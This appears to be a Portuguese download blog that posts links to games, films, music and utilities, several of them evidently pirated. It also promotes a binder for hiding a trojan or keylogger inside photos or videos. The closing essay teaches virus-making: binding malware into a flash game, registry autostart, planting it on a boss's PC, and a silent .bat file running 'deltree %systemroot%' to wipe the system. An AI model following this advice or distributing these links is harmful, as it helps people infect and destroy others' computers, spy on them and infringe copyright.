Sente falta do sangue frio correndo em suas veias enquanto você mira na cabeça do seu adversário? Pois então chegou a hora de você conhecer a evolução do estilo Counter-Strike e aprender a usar novas armas. Combat Arms marca um novo passo em jogos de tiro em um game onde seu jogador se torna mais forte a cada inimigo abatido.

O jogo impressiona em todos os aspectos e não deve nada a nenhum outro título gratuito de tiro em primeira pessoa. Trata-se de um novo jogo multiplayer online que além de propor espetáculos de tiro com extremo realismo, fazem com que você ganhe poder juntando experiência e adquirindo mais equipamentos. Neste momento você pode estar na mira de algum adversário, então não fique parado, pegue sua arma e detone seus adversários.

Tiros e muito sangue neste ótimo game.

Clique aqui para efetuar seu cadastro!

Por que ele é melhor?

Fazia muito tempo que os jogadores de plantão não conferiam um jogo tão empolgante e totalmente gratuito como este. Os gráficos deste game são espetaculares, seus cenários são bastante ricos e a movimentação é de tirar o fôlego. Aqui qualquer um pode empunhar a sua arma e embarcar em uma disputa para se tornar mais poderoso a cada inimigo abatido.

Você pode criar seu personagem ao início do jogo e se utilizar de novos recursos para deixá-lo com a aparência que você quiser.

Counter-Strike 1.6 se utilizava de armas e equipamentos reais, mas que precisavam ser comprados a cada nova partida com o dinheiro ganho. Em Combat Arms você ganha dinheiro e experiência a cada partida e pode utilizá-los para se tornar cada vez mais preciso no campo de combate.

Diversas armas reais com grande poder de fogo estarão a sua disposição e uma imensa variedade de granadas e equipamentos. Você irá passar de nível quando juntar experiência suficiente para tal e ganhar mais precisão com suas armas.

Preparem suas armas

Você pode acessar a loja de armas a qualquer hora que estiver fora das partidas e ter acesso a novas armas e equipamentos. Cada personagem tem cinco espaços para alojar seus brinquedos: um para sua arma principal, um para sua arma secundária, arma branca, lugar para granadas e uma mochila para carregar outras armas. Seu soldado também possui cinco posições para suas roupas: cabeça, rosto, uniforme, vestimenta e mochila. Também é possível coletar as armas deixadas ao chão por inimigos derrotados.

Uma loja de armas reais!

Outra grande novidade deste jogo é que cada arma vem na sua configuração básica, ou seja, sem qualquer acessório. O jogador deve comprar uma mira telescópica para poder ter acesso ao zoom de sua arma por exemplo. Silenciadores e pentes estendidos também podem fazer toda a diferença no meio da partida. Vale lembrar que todos estes equipamentos serão adquiridos por certo período de tempo, sendo mais caros para períodos maiores.

Modos de Jogo

Mire em seus oponentes e desça chumbo!

  • Elimination: os jogadores se dividem em dois times, o primeiro a atingir certo número de mortes vence.
  • One Man Army: similar ao anterior, mas aqui é cada um por si.
  • Search and Destroy: a cada rodada um time diferente recebe uma bomba para implantar no território inimigo, o time que obter a maior pontuação detonando bombas ou evitando as inimigas vence.
Download

(438,00 MB)



Download Dos Links:
Download

Audacity é um editor de áudio que pode gravar, reproduzir e importar/exportar sons nos formatos WAV, AIFF, MP3 e OGG. Edite suas músicas usando cortes, copie e cole recursos (com funcionalidades de desfazer/refazer ilimitadas), mixe faixas ou aplique efeitos na gravação — tudo com muita "audacidade"!

O programa também possui um editor de envelope de amplitude, espectrograma e uma janela para análise de freqüências e áudio em geral. Alguns dos efeitos incluem bass boost (reforço nos graves), wah wah e remoção de ruído. O programa suporta plug-ins VST, os mais utilizados na área da edição de áudio.

Um dos novos recursos de Audacity é uma barra de ferramentas métrica para monitorar níveis de volume durante a reprodução e gravação.

Destaques

Gravação:

A gravação de áudio pode ser feita ao vivo através de um microfone ou mixer. Além disso, a digitalização de sons de fitas cassete, discos de vinil ou minidiscs (MDs) é um processo descomplicado por meio do software. Trabalhando em conjunto com algumas placas de som, ele pode até capturar transmissões de rádio ou quaisquer outros sons reproduzidos no seu PC.

Para registrar sons, você pode utilizar microfones, entradas em linha ou outras fontes. Ajuste as trilhas já existentes para criar gravações multitrilhas em até 16 canais simultâneos (este recurso requer, é claro, que você possua o hardware adequado). Os medidores de nível podem monitorar o volume antes, durante e depois da gravação para obter-se uma maior perfeição e precisão.

Importação e Exportação:

O Audacity é versátil: você pode importar áudio, editá-lo e combiná-lo com outras novas gravações. Exporte suas músicas nos formatos mais populares como WAV, AIFF, AU e OGG Vorbis — sem falar no tradicional MP3 através da biblioteca de codificação LAME opcional. Se você planeja copiar suas gravações para CD, o software também cria os arquivos WAV ou AIFF.

Exportando em MP3:

Para exportar arquivos no formato MP3, é necessário fazer o download optativo de um arquivo .DLL, para informar-se sobre como conseguir o arquivo, basta abrir o Audacity, clicar no menu Arquivo e selecionar a opção Exportar para MP3. Salve um nome de arquivo qualquer e o Audacity informará o nome do arquivo e como consegui-lo.

Edição:

Você tem à diposição recursos básicos para edição de áudio como cortar, copiar, colar e deletar trechos. Outro grande auxílio na hora de manipular áudio são as opção de refazer/desfazer (ou até mesmo retroceder ou avançar inúmeros passos). Assim é possível usar a criatividade sem medo de danificar os processos anteriores executados ou realizar ações repetitivas de maneira mais dinâmica.

Em se tratando de edição, outra vantagem apresentada pelo Audacity é a rapidez na edição de arquivos muito grandes — para se ter uma idéia, até mesmo alguns programas profissionais da área não são tão ágeis quanto ele. Editar e mixar várias faixas não deve causar maiores complicações: os recursos são acessíveis até mesmo para os mais temerosos à tecnologia da música.

Use ferramentas como a "Ferramenta de Desenho" — localizada nos botões, logo abaixo do menu "Arquivo" e identificada com o ícone de um lápis —, para alterar e aperfeiçoar efeitos de sampling ou moderar picos em partes da gravação. Aproveite o recurso de fade in ou fade out para introduzir músicas ou finalizá-las; aplique a ferramenta "Envelope" para obter maior suavização e uniformidade na música como um todo.

Efeitos:

A variedade de efeitos é uma das marcas do programa. Divirta-se ou module passagens com efeitos como o pitch(afinação) sem alterar o tempo; remova ruídos de fundo, chiados e outros de maneira acessível.

Ajuste freqüências através da equalização, do filtro FFT e efeitos como o Bass Boost (este último é útil no destacamento de graves, especialmente na música eletrônica). Compressores de volume, amplificadores de freqüências e efeitos de normalização completam o pacote das funções mais tradicionais.

Para quem procura por maior diversidade, fazem-se presentes Eco, Phase, Wahwah, Inversão, entre outras preciosidades.

Qualidade do Som:

A gravação e a edição podem ser feitas em amostras de 16-bit, 24-bit e 32-bit (ponto flutuante) em até 96 KHz. As taxas de amostragem e os formatos são convertidos através de mecanismos de alta qualidade, em tempo real.

Plug-Ins:

Audacity, como todo software de produção sonora que se preze, possui suporte aos padrões de plug-ins mais conceituados. Entre eles estão LADSPA e VST; este é amplamamente conhecido e utilizado na área. Caso você precise de mais e entenda um pouquinho de programação, há uma linguagem chamada Nyquist que permite a confecção de novos efeitos para o Audacity.

Análise:

Uma das partes mais importantes durante o aperfeiçoamento da sua gravação é a análise. No Audacity há um modo espectograma para visualização das freqüências, além de um comando (Espectro de Freqüência) para análises mais detalhadas.

Um Senhor Editor

Em suma, Audacity é um senhor editor e gravador de áudio com recursos e efeitos profissionais, e ainda por cima, é grátis! Perfeito para quem está começando ou já tem experiência na área. Vale a pena conferir!

Download
(4,52 MB)

Nome: sound Forge
Fabricante: Adobe
Categoria: Programas
Tamanho: 40mb

O Sound Forge 9 é considerada uma das mais poderosas - se não a mais poderosa - ferramentas de edição de áudio do mercado. Utilizado em grande parte dos estúdios de gravação e edição de áudio, este software de poder de fogo incrível está presente também nas casas de editores amadores.

Efeitos: Em uma das maiores gamas de efeitos especiais, nativos, estão presentes tanto os efeitos mais simples como flange, pitch (afinação) e eco até os mais robustos como wave hammer.

Grave áudio e corrija os defeitos

Sound Forge também é capaz de capturar áudio do microfone e da entrada Audio In de sua placa de som. Além disso, o incômodo chiado das gravações de voz e de compilaçoes de fitas cassete e discos de vinil pode ser anulado através de correções dignas de estúdios profissionais.

Como se não bastasse, é possível criar transições de volume de áudio em suas músicas. Todos esses recursos juntos permitem grandes ganhos de qualidade de áudio para usuários conhecedores de ferramentas de edição. Resumindo, se o que você busca é um editor potente, pronto para desempenhar todas as tarefas necessárias no dia-a-dia de um profissional, não procure mais: Sound Forge é a escolha ideal para quem tem experiência na área e não vê problemas em editar preferências minuciosamente para obter um efeito mais próximo do desejado, ao invés de simplesmente clicar e ouvir o resultado.

Download


CryptLoad é uma ferramenta com mais de um ano de experiência. A aplicação oferece a possibilidade de confortavelmente descarregar conteúdos de sites ditos “normais” e de sites do tipo Rapidshare.com, Megaupload, entre outros.
Esta nova versão do CryptLoad está a funcionar muito melhor que a versão anterior, pelo menos o peso nos recursos é menor, e o sucesso a descarregar é bem maior.

Esta ferramenta tem a capacidade de detectar determinados links para download e adiciona-os à sua área de download, estes ficheiros vão sendo “escutados” para saber a disponibilidade do servidor de origem, permitindo o descarregamento faseado. Deixa de ficar com os nervos em franja à espera que lhe libertem o acesso a novos downloads.

Além desta capacidade a ferramenta permite a gestão inteligente de downloads, permite descarregar vários ficheiros em simultâneo, permite recolher as várias partes do mesmo ficheiro, permite re-conectar o router em caso de perda de sinal, permite ordenar por tempo de espera, por tamanho, por serviço concluído, etc…

Uma função muito interessante é o “escutar” da área de transferências, logo que eu faça um ctrl+c este reconhece as extensões adicionadas à sua lista e importa o link diretamente para a sua área de ação. por Exemplo se você selecionar 3 parte de um download do rapidshare o programa reconhece e adiciona-os para baixá-los.

Se houver necessidade de logins, dentro de algum site de armazenamento, este pode ser configurado nas opções, assim como se houver necessidade de efetuar um captcha (código de confirmação) esta aplicação reconhece a função.

Caso deixe um download à espera de terminar, pode agendar o encerramento da máquina após o término do descarregamento.

O Router do Cryptload tem suporte para uma ferramenta chamada Router Control. Basicamente esta ferramenta faz “resets” automáticos ao router, sem qualquer intervenção de nossa parte, renovando o nosso IP voltando a ser visto como novo utilizador a solicitar tráfego dos servidores do Rapidsahre.

DICA: Para além do rapidshare, o Cryptload também suporta outros serviços de alojamento de ficheiros, como o Megaupload.

Video no youtube ensinando a usar
http://br.youtube.com/watch?v=c5orRbF3fvQ&feature=related


Informações:

Tamanho: 20.3MB
Formato: Rar
Facilidade de uso: 10
Interface Gráfica: 10
Nº de mídias: 1
Idioma: Inglês
Servidor: Rapidshare
Download:http://rapidshare.com/files/130136330/CryptLoad_1.1.3.erivanildo.thegenius.us.rar

Após dois anos desde o surgimento do Batman (Christian Bale), os criminosos de Gothn City têm muito o que temer. Com a ajuda do tenente James Gordon (Gary Oldman) e do promotor público Harvey Dent (Aaron Eckhart), Batman luta contra o crime organizado comandado pelo Coringa (Heath Ledger).

Tamanho: 946mb
Resolução: 512×288
Frame Rate: 23.976
Formato: Ts
Qualidade de Audio: 7
Qualidade de Vídeo: 7
Codec do Vídeo: Xvid
Codec do Áudio: MPEG-1 Layer 3
Idioma: Dublado

CD1: http://www.badongo.com/pt/vid/816208
CD2:http://www.badongo.com/pt/vid/816203/1

download mp3

1. É o que Me Interessa - Lenine
2. Amado - Vanessa da Mata
3. Sou Dela - Nando Reis
4. Não Vou Me Adaptar - Arnaldo Antunes e Nando Reis
5. Quantas Vidas Você Tem? - Moska
6. Fala - Ritchie
7. Tudo Passa - Túlio Dek
8. Pa’ Bailar - Bajofondo
9. Mulher sem Razão - Adriana Calcanhotto
10. Morena dos Olhos d´Água - Chico Buarque
11. O Tempo Vai Apagar - Zé Renato
12. Me Abrace - Wanessa Camargo e Grupo Camila

  1. EasyShare Download a Favorita Nacional
  2. Megaupload Download a favorita



Porgrama muito bom para juntar algum server de trojan ou ardamax com mais alguma coisa, por exemplo: uma foto, video, oque voce quiser.
Esse programa não e utilisado para apenas utilidade maleficas mas sim beneficas :)
É só vc usar a imaginação e pimba =D

Download


Downloads:

Complementos:
Tutorial encinando como usar: (By: LLPS)



Tamanho: 359Mb
Áudio: Português
Legenda: Não Disponível
Formato: RMVB
Gênero: Comédia
Link: Megaupload



Download



Po (Jack Black) é um urso panda desajeitado, que trabalha no restaurante de macarrão de sua família. Um dia ele é surpreendido ao saber que foi escolhido para cumprir uma antiga profecia, o que faz com que treine ao lado de seus ídolos no kung fu: os mestres Shifu (Dustin Hoffman), Garça (David Cross), Tigresa (Angelina Jolie), Louva-deus (Seth Rogen), Macaco (Jackie Chan) e Víbora (Lucy Liu). Quando o traiçoeiro leopardo da neve Tai Lung (Ian McShane) retorna, cabe a Po defender o Vale da Paz.

Formato: TELESYNC
Gênero: Animação
700 MB / Dublado
BITROAD
BADONGO
LETITBIT
MEGASHARES
FLYUPLOAD
EATLIME
ADRIVE

links:
http://rapidshare.com/files/59186203/AkirA.part1.rar

http://rapidshare.com/files/59202980/AkirA.part2.rar

http://rapidshare.com/files/59204924/AkirA.part3.rar

http://rapidshare.com/files/59206626/AkirA.part4.rar

http://rapidshare.com/files/59208355/AkirA.part5.rar

http://rapidshare.com/files/59208496/AkirA.part6.rar

Pass:www.chilewarez.org





Devil May Cry 4 (DMC 4) foi anunciado oficialmente pela Capcom em março deste ano, causando um estardalhaço enorme entre os fãs por ter sido divulgado para três plataformas: PS3, Xbox 360 e PC (a franquia era exclusiva da Sony). Toda a atmosfera gótica retorna em grande estilo, só que desta vez figuram mais dois personagens além de Dante: Nero e Kyrie. Até agora sabe-se que Nero será um personável jogável; supõe-se, naturalmente, que Dante também; e o grau de participação de Kyrie ainda é um mistério.

O game é a segunda seqÜência de Devil May Cry — soa estranho, não? Explicando: DMC 3 era um prólogo ao Devil May Cry original, em outras palavras, DMC 4 é a continuação de DMC 2. Fontes como a revista japonesa Famitsu, apontam que Dante atuará como coadjuvanta no enredo.

Nero (em italiano: preto) — um sujeito de calças jeans azuis, casaco longo e outras vestimentas em tons vermelhos — vislumbra Dante como um vilão. Isso é justificado pelo culto a Sparda, deidade adorada pela Kyo-dan Kishi (Order of the Sword; ou em bom português "Ordem da Espada"). Nero testemunha Dante assassinando alguns membros da supracitada ordem e, por isso, interpreta-o como mau.

Entre as armas de Nero constam a Red Queen (Rainha Vermelha), uma espada manejada com apenas uma mão e decorada com bom gosto e esmero; um revólver de alcunha Blue Rose (Rosa Azul); e os poderes obscuros e diabólicos que emanam do seu braço, chamados de "Devil Bringer" (literalmente, algo como "aquele ou aquilo que traz o demônio ou o diabólico"). O visual do game promete surpreender as expectativas dos mais exigentes, além da combinação de ação estilizada com o clima que só Devil May Cry oferece.

Requerimentos: Processador Pentium 4 3 GHz ou equivalente, 512 MB de memória RAM (Windows XP), 1 GB de memória RAM (Windows Vista), Placa de vídeo GeForce 6600 ou equivalente com 256 MB de memória RAM e com suporte a Shader Model 3.0, DirectX 9.0c ou superior, Windows XP ou Vista


Opção 1:


http://rapidshare.com/files/128263362/event-photos200.rar
http://rapidshare.com/files/128263416/event-photos200.r00
http://rapidshare.com/files/128263350/event-photos200.r01
http://rapidshare.com/files/128263321/event-photos200.r02
http://rapidshare.com/files/128263333/event-photos200.r03
http://rapidshare.com/files/128263294/event-photos200.r04
http://rapidshare.com/files/128263383/event-photos200.r05
http://rapidshare.com/files/128263360/event-photos200.r06
http://rapidshare.com/files/128263337/event-photos200.r07
http://rapidshare.com/files/128263336/event-photos200.r08
http://rapidshare.com/files/128263309/event-photos200.r09
http://rapidshare.com/files/128263381/event-photos200.r10
http://rapidshare.com/files/128263370/event-photos200.r11
http://rapidshare.com/files/128263384/event-photos200.r12
http://rapidshare.com/files/128263455/event-photos200.r13
http://rapidshare.com/files/128263402/event-photos200.r14
http://rapidshare.com/files/128263375/event-photos200.r15
http://rapidshare.com/files/128263286/event-photos200.r16
http://rapidshare.com/files/128263345/event-photos200.r17
http://rapidshare.com/files/128263391/event-photos200.r18
http://rapidshare.com/files/128263385/event-photos200.r19
http://rapidshare.com/files/128263341/event-photos200.r20
http://rapidshare.com/files/128263361/event-photos200.r21
http://rapidshare.com/files/128263407/event-photos200.r22
http://rapidshare.com/files/128263414/event-photos200.r23
http://rapidshare.com/files/128263353/event-photos200.r24
http://rapidshare.com/files/128263417/event-photos200.r25
http://rapidshare.com/files/128263305/event-photos200.r26
http://rapidshare.com/files/128263371/event-photos200.r27
http://rapidshare.com/files/128263404/event-photos200.r28
http://rapidshare.com/files/128263380/event-photos200.r29
http://rapidshare.com/files/128263387/event-photos200.r30
http://rapidshare.com/files/128263376/event-photos200.r31
http://rapidshare.com/files/128263423/event-photos200.r32
http://rapidshare.com/files/128263377/event-photos200.r33
http://rapidshare.com/files/128263424/event-photos200.r34
http://rapidshare.com/files/128263392/event-photos200.r35
http://rapidshare.com/files/128263413/event-photos200.r36
http://rapidshare.com/files/128262899/event-photos200.r37

Se você já está cansado de olhar sempre para a mesma área de trabalho, e tem até medo de utilizar temas modificados em seu Windows, então precisa conhecer o MyColors. De uma maneira muito segura e fácil, você muda totalmente o tema de seu Windows, com novos ícones, papéis de parede e até o menu iniciar.

Um ponto forte a ser destacado é que o MyColors utiliza uma tecnologia que funciona além do sistema do Windows. Ou seja, ele não modifica nada do sistema, nenhum arquivo DLL ou qualquer configuração da Microsoft que possa danificar o seu sistema operacional.


Aplicando um novo tema

Ao abrir o programa, você já tem uma lista dos temas disponíveis. Para aplicá-lo, é só você selecioná-lo no menu do lado esquerdo, e depois clicar em Apply. Depois de alguns segundos você verá que toda a sua área de trabalho foi alterada, incluindo até os ícones e o papel de parede.

Aplicando um novo tema.


Tema Diamond, disponível no site do programa.Mais temas (tanto pagos quanto gratuitos)

Provavelmente você notará que o MyColors só inclui um tema, o “Think Green”. Se você quiser mais temas, você tem a opção de comprar os pagos encontrados na aba “More Themes”.

Caso contrário, poderá baixar os outros dois temas gratuitos que o programa disponibiliza em seu site. Para vê-los, clique aqui.

O Tema Quest ainda inclui dois Gadgets!


Outras funções do programa

Em Settings, você pode definir para que o programa ignore alguns programas ao definir o tema. Por exemplo, se você não quer que o programa afete o Mozilla Firefox, ele continuará com o tema padrão, e todo o resto continuará modificado pelo MyColors .

Voltando para o padrão.Se você quiser, pode mudar o seu papel de parede indo em Wallpapers. Nesta aba, você tem até uma visualização melhor dos papéis de parede que você tem em seu Windows, além dos que vieram junto com o MyColors .

Voltando para as configurações padrão

Quer voltar para o seu antigo tema? É só ir em My Themes e aplicar o “Windows XP Desktop” (no caso de você utilizar o XP) ou “Windows Vista Desktop” (caso você use o Vista).


NOSSA OPINIÃO

À primeira vista, tudo é muito bonito, agradável e moderno. Entretanto, com o tempo, você acaba cansando dos temas, principalmente os que vêm junto com o Windows. É aí que você resolve dar uma mudada no visual.

O problema é que tem alguns programas que modificam o sistema e podem prejudicar o seu Windows. O MyColors se mostrou muito seguro quanto à isso. Além disso, é muito prático, sendo que para mudar de tema é só clicar em um botão e pronto.

Infelizmente o programa só traz um tema junto, mas disponibiliza outros dois gratuitos. Todos estes três temas são muito bonitos e agradáveis, com um design de dar água na boca. Alguns deles até trazem gadgets junto, como previsão do tempo, relógio e calendário.

A praticidade do MyColors aliada à segurança e ao lindo visual, faz com que o programa certamente seja muito bom. Então, se você gosta de mudar o visual, já tem ótimas opções que, com certeza, não se arrependerá ao baixar o programa.



baixar MyColors

SharePod é uma ferramenta que veio para desacorrentar o iPod do iTunes. Com ela, você adiciona e remove as músicas, vídeos e fotos do iPod sem precisar do jukebox da Apple. Ele ainda faz backup de todos os arquivos do dispositivo, copiando-os para o computador. Além disso, é compatível também com o iPhone, o celular de Steve Jobs que contagiou o mundo.

Antes de tudo, para usar o SharePod é necessário fazer o download de um pequeno pacote com dois arquivos essenciais. Trata-se de uma pequena biblioteca que fará com que o aparelho seja reconhecido automaticamente pelo software, sem a necessidade de configurações. Você deve baixá-lo CLICANDO AQUI.

Como instalar

Após baixar o SharePod e a pequena biblioteca fornecida através do link acima, descompacte os arquivos contidos na biblioteca para dentro do iPod. Feito isso, execute o programa para que todas as suas músicas, vídeos imagens e arquivos fiquem disponíveis para cópia e remoção.

Onde tudo acontece

Abandonando um namoro grudento

Esqueça o iTunes, SharePod é simples: todas as ferramentas encontram-se agrupadas em um único menu superior com ícones bem intuitivos. Para copiar as músicas para o computador, selecione aquelas que você deseja e clique no botão “Copy to PC” (Copiar para PC). No campo “Copy tracks to this folder” (Copiar faixas para essa pasta) escolha o diretório no qual as músicas serão copiadas e pressione “Ok”. Agora é só preparar os ouvidos e ligar o som no próprio PC.

Barra de menu de fácil acesso

Já para adicionar músicas para o MP3 Player é igualmente simples. Selecionando a opção “Copy to iPod” (Copiar para iPod), uma outra janela surgirá. Nela, clique em “Add files...” (Adicionar arquivos), marque os arquivos almejados e pressione “Ok”. Aguarde a transferência e você terá novas músicas para curtir direto no iPod.

Copiando músicas para o computadorO programa oferece ainda uma ferramenta para a criação de playlists, deixando os arquivos do dispositivo organizados em pastas distintas. E quando o assunto é organização, SharePod dá o exemplo. A interface do programa é limpa, e muito bem dividida: uma coluna para as playlists e a janela principal para as músicas, deixando o “ambiente” muito agradável.

A principal, senão maior vantagem desse software, é a ferramenta de backup que ele oferece, pois além de uma cópia de segurança de seus arquivos, é a oportunidade para compartilhar suas músicas com os amigos. O processo de backup é rápido e muito eficiente, sem perda alguma na qualidade da música.

Outra funcionalidade que merece destaque é ejeção do iPod sem a necessidade de abrir várias janelas para remover dispositivos externos. Isso graças à opção “Eject iPod” (Ejetar iPod), encontrada no menu superior do programa. Um simples clique e seu aparelho está livre para rodar com você por aí.

Nossa opinião

Depender de um único programa para atualizar seu iPod ou compartilhar suas músicas com os amigos é ruim. Foi pensando nisso que Jeffrey Harris desenvolveu o SharePod, uma forma de “declarar a independência” com muita eficiência.

O fato de o programa não possuir player embutido torna necessário o uso de outro aplicativo para ouvir as músicas, mas não tira o prestígio do SharePod. Sua interface é simples e amigável, além de muito intuitiva e bonita. Até mesmo usuários novatos podem usá-lo sem complicações, e sem a necessidade de dominar o idioma inglês.

Um aspecto que pode trazer um pouco de confusão para usuários sem muita experiência é a necessidade do download de dois arquivos separados, mas com nomes semelhantes. A solução seria unir ambos os arquivos em um só, diminuindo a possibilidade de algum engano ao abrir os arquivos que prejudique o prestígio do programa.

Quem está pensando que toda essa liberdade irá custar espaço no disco rígido se enganou. SharePod ocupa dez vezes menos espaço do que o iTunes, não trava nem demora para carregar. Finalmente, escolha o programa que mais lhe agrada, e curta suas músicas.



baixar SharePod

Tamanho: 65Mb
Gênero: Rock, Gótico

Download: Rapidshare


Game Information

Online Modes: Competitive
Number of Players: 1 Player
Number of Online Players: 4 Online


Download
http://rapidshare.com/files/80820465/Need_For_Speed_Most_Wanted.7z.001


Video: XVID 512x288 AVI
Audio: AC3, 256kbps
Whole Size: 695mb ,1:11:02

Detailed Radar Mod (Mapa detalhado)

Este mod deixa seu mapa e radar do seu GTA mais detalhado, como se fosse uma foto do seu mapa e radar tirado por satélite.

Instalação

Para instalar, é preciso o San Andreas Mod Installer (SAMI), para fazer o download do SAMI, clique aqui. Descompacte o Detailed Radar Mod em uma pasta qualquer, vá à pasta que você descompactou o mod e abra o arquivo sami-install.sami, o SAMI vai abrir, desmarque a opção Backup Files Before Installation, clique em Continue e depois Install, feche o SAMI ou aperte em Play San Andreas (que traduzindo fica Jogar GTA San Andreas).

Créditos: Ian Albert, BaygoN, simoncampbell

Download

Visual Tooltip

ReiDoDownload.BlogSpot.com

Visual Tooltip é um software para você pré-visualizar aplicativos na barra de ferramentas com imagens em miniatura. Deste modo, quem trabalha com muitas janelas pode agilizar todo o trabalho ao passar o mouse em qualquer pasta ou programa minimizado, reconhecendo o conteúdo sem a necessidade de abri-lo.
Além disso, Visual Tooltip inclui uma barra de ferramentas flutuante, intitulada "Dock Bar". Nela é possível adicionar imagens em miniatura dos programas e atalhos para abrir todos os aplicativos que estão rodando. O design do software não é nada brilhante, contudo você tem a vantagem de não precisar instalá-lo! Tamanho: 1 Mb Formato: RAR

ReiDoDownload.BlogSpot.com

Visual Tooltip é um software para você pré-visualizar aplicativos na barra de ferramentas com imagens em miniatura. Deste modo, quem trabalha com muitas janelas pode agilizar todo o trabalho ao passar o mouse em qualquer pasta ou programa minimizado, reconhecendo o conteúdo sem a necessidade de abri-lo.


Além disso, Visual Tooltip inclui uma barra de ferramentas flutuante, intitulada "Dock Bar". Nela é possível adicionar imagens em miniatura dos programas e atalhos para abrir todos os aplicativos que estão rodando. O design do software não é nada brilhante, contudo você tem a vantagem de não precisar instalá-lo!

Tamanho: 1 Mb
Formato: RAR

Você ja esta cansado da quela maldita marca d'agua do windowns Vista Starter?

Seus problemas acabaram!! :D

Com esse programinha você só executa ele que a quela maldita marca sai!!

Download

Total OverdoseEm 1989 no coração da selva mexicana o agente Ernesto Cruz estava lutando para conseguir pegar um avião que o levasse de volta para o conforto do lar. Só que isso nunca aconteceu, pois ele morreu e uma overdose foi alegada para o laudo. Agora, no presente, o filho de Ernesto, Ramiro, saiu da prisão e se juntou ao seu irmão gêmeo, Tommy. Os dois pretendem achar o assassino do pai e vão embarcar em uma aventura cheia de tequila e tiros no sub-mundo do México. Esse jogo é em tiro em 3ª pessoa e conta com um filme de introdução e a missão Smash the Stash. Nessa missão você entrará na pele de um agente disfraçado dentro de um cartel mexicano de drogas.

Configuração Minima:
Proc: Pentium III 800MHz ou equivalente # RAM: 128 MB # Placa de vídeo: GeForce 3 ou ATI Radeon 8500 # DirectX 8.1.

Tamanho: 1,6 GB

CursorFX é um programa que chega para inovar em temas e estilos de cursores do mouse, permitindo-lhe escolher vários modelos e personalizar seu Windows. Com cores e tamanhos variados, neste aplicativo você vai localizar opções para acabar com a monotonia em seu computador, alterando constantemente o estilo do cursor.

Esta versão é gratuita, porém apresenta algumas limitações quanto às funcionalidades da ferramenta. As opções de efeitos, caminhos e configurações não estão disponíveis. O que está livre para você usar e abusar são mais de 10 modelos que, apesar de não receberem efeitos especiais, como de explosões, raios, borbulhas etc., possuem animações próprias e simples.

Escolha a sua opção

Todos os recursos de CursorFX apresentam-se em um painel de opções muito fácil de usar.

Painel de opções do programa.

Em “My Cursor”, você pode localizar uma lista com os cursores disponíveis. Apenas escolha um deles e em seguida clique em “Apply”. Instantaneamente, seu cursor é modificado e fica com um visual novinho. Mude constantemente o estilo do cursor e adapte-o com o tema de sua preferência.

Download

Um vírus é um programa do mal, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com instruções que poderiam ser usadas para o bem, mas aplicadas para o mal. Portanto, para fazer um vírus, aprenda a fazer programas. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como rodá-lo? O meio mais simples é convencer os usuários a executar o arquivo do vírus nos seus computadores. Ou você mesmo, por exemplo, pode executá-lo no computador do chefe enquanto ele estiver almoçando. Para ajudar, existem programas que embutem um executável dentro de outro, de modo que um seja executado normalmente, e o outro de forma oculta. Isso permite, por exemplo, criar um joguinho em flash (ou pegar uma dessas muitas animações distribuídas em .exe, o projetor do flash), embutir o vírus nele e mandar pra pessoa. Ela abre, vê o joguinho, acha lindo. E por trás de tudo isso, enquanto ela está distraída e entretida, o vírus trabalha. Ou simplesmente se copia para alguma pasta, cria entradas no registro do Windows para se iniciar na próxima sessão, e ataca a partir dali.

E os anti-vírus, como ficam? Irão bloquear seu vírus? Eles não sabem se um programa é um vírus ou não, a menos que tenham a “identidade” deste programa marcada como “suja”, como um vírus. Isso acontece quando o vírus fica muito divulgado, e acaba caindo nas mãos do pessoal das empresas de anti-vírus. Eles checam o arquivo, fazem testes e mais testes. Comprovado o caso de ser um vírus (ou seja, de ser um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma somatória MD5, um trecho de código existente no arquivo, uma seqüência de operações que provavelmente só existam naquele arquivo, etc). E cadastram esse código no anti-vírus. Ao fazer a varredura, se o anti-vírus identificar algum arquivo com algumas qualidades cadastradas em seu banco de dados, ele entenderá ele como vírus e tentará eliminá-lo ou notificar o usuário. Por isso é bom estar sempre com seu anti-vírus atualizado, pois praticamente todo dia surgem novos vírus. Estando atualizado, ele pode identificar os vírus mais recentes. Mesmo que um programa seja o pior vírus já inventado, se ele não estiver catalogado no anti-vírus, ele provavelmente se dará muito bem e executará suas funções. Depois? Depois é tarde, né. Já eu, particularmente, não uso anti-vírus, pois sei me cuidar. Não quero um programa verificando tudo o que faço e deixando meu micro mais lento. Muita gente reclama do Windows e talz e bla bla bla. Mas essa gente poderia parar um pouco e pensar nela mesma, nas atitudes. A maioria dos vírus e spywares só consegue realizar seus objetivos porque o usuário do computador vacilou. Mas blz, isso não vem ao caso agora.

Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um “.bat” com o comando “deltree %systemroot%” adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado. De forma semelhante agem os vírus de scripts e macros: por isso, é bom tomar cuidado com apresentações do Power Point de desconhecidos, arquivos do Word, etc. Não precisa ser paranóico e ficar sem abrir esses arquivos, basta pensar e desativar as macros no seu programa, entre outros cuidados. Usar o visualizador do PowerPoint, em vez do PowerPoint completo, é uma boa idéia para ver apresentações da Internet, já que as macros e arquivos vinculados nem serão interpretados. No caso de scripts “.js” ou “.vbs”, só execute-os se souber realmente o que está fazendo. Destaco que esse “.js” não é de “JavaScript”, pois esta mesma extensão é usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas paranóias. Não é porque a AIDS come solto que você vai deixar de transar com pessoas que conhece a pouco tempo ou na balada, mas deverá se cuidar, né? A mesma coisa pode ser dita em termos de PCs. Execute programas, rode, teste, fuce, explore, mas com responsa. Isso fica por sua conta. Do mesmo jeito que “sexo 100% seguro é não fazer sexo”, eu diria que “navegar na Internet de forma 100% segura é não navegar na Internet”. Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha legal, e pode pegar um resfriado… Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet (nem modem nem placa de rede ele tem).

